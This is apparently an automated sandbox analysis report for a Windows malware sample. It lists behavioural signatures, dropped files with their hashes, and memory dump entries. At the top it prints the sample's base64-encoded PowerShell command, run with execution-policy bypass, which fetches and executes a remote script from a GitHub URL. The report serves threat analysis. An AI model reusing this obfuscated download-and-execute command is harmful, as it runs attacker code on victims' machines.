C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blacklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RESAE08.tmpMD5
539ef5fde4c4c647255c7b9fbe1dc409
SHA146edce61a8161ec08fcc62ac9b99e6df253671da
SHA2566edd9fe30a59bdb8254775951215b91b776ee8bed657d8c5e65bc5a3badeb7f9
SHA512fa3c605042a19eb8160528c57da9cc2894acc967cd3ebd796fecd9f698e329dc6a825497b005bb82d6a0716959216ef238c014f86f385963dff28146c19df65e
-
C:\Users\Admin\AppData\Local\Temp\get-points.ps1MD5
dac6b25db50155c0c78d5bf64fb95fa3
SHA19e49c8f7a6df94acdefd0daa4c330f92f6d01d0d
SHA2566967c2ea21792d390309dfd66d56b19f89d89ba4a6fb8f39f10a8212d5e70eaf
SHA512679b3706f2c03898afb4250b1f51d5e0e7187ed923f7d7cc3a06c5f9a1e5b18bbbc46e9c2c9abd0b4b42e5e3a5b2dd668e3057063562b874119c42e855292868
-
C:\Users\Admin\AppData\Local\Temp\get-points.zipMD5
7cac19b2868c41555db4b71219217f9b
SHA1d6f77db578db3c5c572c3a944d9072ed00560dcb
SHA256d8f648e2952466c25343b095ed14591b25b29d0d1c391ca019a8d8f0a39b934a
SHA5125bafea5eed1ba0493188bb79eafda47a141281fb3258be0dfe08b6b78e5dcf731fd2142b94f95b3203fa6daad27fff1f4495ac7bdebe6eb8a9cbe31b16bfc7b6
-
C:\Users\Admin\AppData\Local\Temp\x4qns4nh\x4qns4nh.dllMD5
9f8ecbc9c0c19bac7409ae7a459044b9
SHA1709c07554173c190e171e38f14c2301a062f671b
SHA25657846d837809a7715d768e9a4773f3f1091a2161eebc0ad03942e6acf11f8458
SHA512ed7fa162c0362c2204a0ec91bb02e7d84fb338ad5575071e77c7bdb72fc9ec9f46eb783730add2844182eb87078fc13d4758be667d364b5bd74413acfb733a35
-
\??\c:\Users\Admin\AppData\Local\Temp\x4qns4nh\CSC2BC06D68D97C49B4A01877BFEAB6C4F7.TMPMD5
c1f621e1f90285325043e2a08de8a2da
SHA1ed4c2b3a0957212666fdb6b641f3e5d572ccaf03
SHA256522e86fe0f5c8684aa4d1c47d957264c827da7d0f810c96652ec7dca1421c373
SHA512e9981f35ee164f62883bb8baccb6e2cf6d9ef4c1cbab087b1f98c69e6211b8781de595bad50efc4760ef565c2b5d7935b74425fc455aad70d108549a761e5b76
-
\??\c:\Users\Admin\AppData\Local\Temp\x4qns4nh\x4qns4nh.0.csMD5
6f235215132cdebacd0f793fe970d0e3
SHA12841e44c387ed3b6f293611992f1508fe9b55b89
SHA256ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec
SHA512a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e
-
\??\c:\Users\Admin\AppData\Local\Temp\x4qns4nh\x4qns4nh.cmdlineMD5
9167131ccc835661d4aaaa34ad57d2c2
SHA1ba95628e502694990fb96ce5f461cb29efb8f869
SHA25614a7c285231e444d9f0ee2d46670c90a27e12070ac332f1ab090a001b4442264
SHA5129bef6fa843504a37f5d9993b824ef723129154f446b41c12891f948d9531a91cbc9b2f5a0a5caa975ef16ee6323ee56258571f07ccfa2b9d67dcc90aac46eb64
-
\Windows\Branding\mediasrv.pngMD5
eeb448ea2709c57b9ea2e223d0c79396
SHA138331dd027386151ee37a29a7820570a76427b02
SHA256c82a8ca8997348bc1631637799d8c88e33df3b64d23fdb006a1afdb5e0170272
SHA512c133096ce90e5693669c056a31870b982b162196508babae4d1d9eb4055f2096af9460164d68885693af56389a42977f4193906da1d19f457e26187a46a5e3fc
-
\Windows\Branding\mediasvc.pngMD5
bb873bd05a47f502ee4ed3c4ea749a4f
SHA1e55a6bf49a4833fb9e9b123df39dac9bf507f75a
SHA256a6a28143f81b007c6853cc80829c16d2aadbe427abe1408276b558f34904900a
SHA512ce2a22e5e78d3f01a6880a48153f6d3ba8ff025d7bbfe8949b7742a5b7ffa9e44484027353bb80b70e8cad8181dc26b6aabe637b5f7fd2aa4a99cd880d758548
-
memory/68-31-0x0000000000000000-mapping.dmp
-
memory/188-15-0x0000000000000000-mapping.dmp
-
memory/360-27-0x0000000000000000-mapping.dmp
-
memory/580-42-0x0000000000000000-mapping.dmp
-
memory/744-23-0x0000000000000000-mapping.dmp
-
memory/744-7-0x0000000000000000-mapping.dmp
-
memory/1260-48-0x0000000000000000-mapping.dmp
-
memory/1260-49-0x00007FFB56540000-0x00007FFB56F2C000-memory.dmpFilesize
9.9MB
-
memory/1264-36-0x0000000000000000-mapping.dmp
-
memory/1400-1-0x0000000001890000-0x0000000001891000-memory.dmpFilesize
4KB
-
memory/1404-41-0x0000000000000000-mapping.dmp
-
memory/1908-25-0x0000000000000000-mapping.dmp
-
memory/2144-24-0x0000000000000000-mapping.dmp
-
memory/2168-35-0x0000000000000000-mapping.dmp
-
memory/2212-44-0x0000000000000000-mapping.dmp
-
memory/2228-10-0x0000000000000000-mapping.dmp
-
memory/2228-22-0x0000000000000000-mapping.dmp
-
memory/2260-20-0x0000000000000000-mapping.dmp
-
memory/2432-39-0x0000000000000000-mapping.dmp
-
memory/2660-46-0x0000000000000000-mapping.dmp
-
memory/2668-32-0x0000000000000000-mapping.dmp
-
memory/2692-38-0x0000000000000000-mapping.dmp
-
memory/2756-21-0x0000000000000000-mapping.dmp
-
memory/2792-26-0x0000000000000000-mapping.dmp
-
memory/2932-19-0x0000000000000000-mapping.dmp
-
memory/2944-47-0x0000000000000000-mapping.dmp
-
memory/3264-33-0x0000000000000000-mapping.dmp
-
memory/3264-40-0x0000000000000000-mapping.dmp
-
memory/3384-34-0x0000000000000000-mapping.dmp
-
memory/3384-18-0x0000000000000000-mapping.dmp
-
memory/3456-17-0x0000000000000000-mapping.dmp
-
memory/3852-30-0x0000000000000000-mapping.dmp
-
memory/3892-5-0x0000023EDD750000-0x0000023EDD751000-memory.dmpFilesize
4KB
-
memory/3892-14-0x0000023EDD6E0000-0x0000023EDD6E1000-memory.dmpFilesize
4KB
-
memory/3892-4-0x0000023EDD550000-0x0000023EDD551000-memory.dmpFilesize
4KB
-
memory/3892-3-0x00007FFB56540000-0x00007FFB56F2C000-memory.dmpFilesize
9.9MB
-
memory/3892-2-0x0000000000000000-mapping.dmp
-
memory/3932-16-0x0000000000000000-mapping.dmp
-
memory/3932-45-0x0000000000000000-mapping.dmp
-
memory/3996-37-0x0000000000000000-mapping.dmp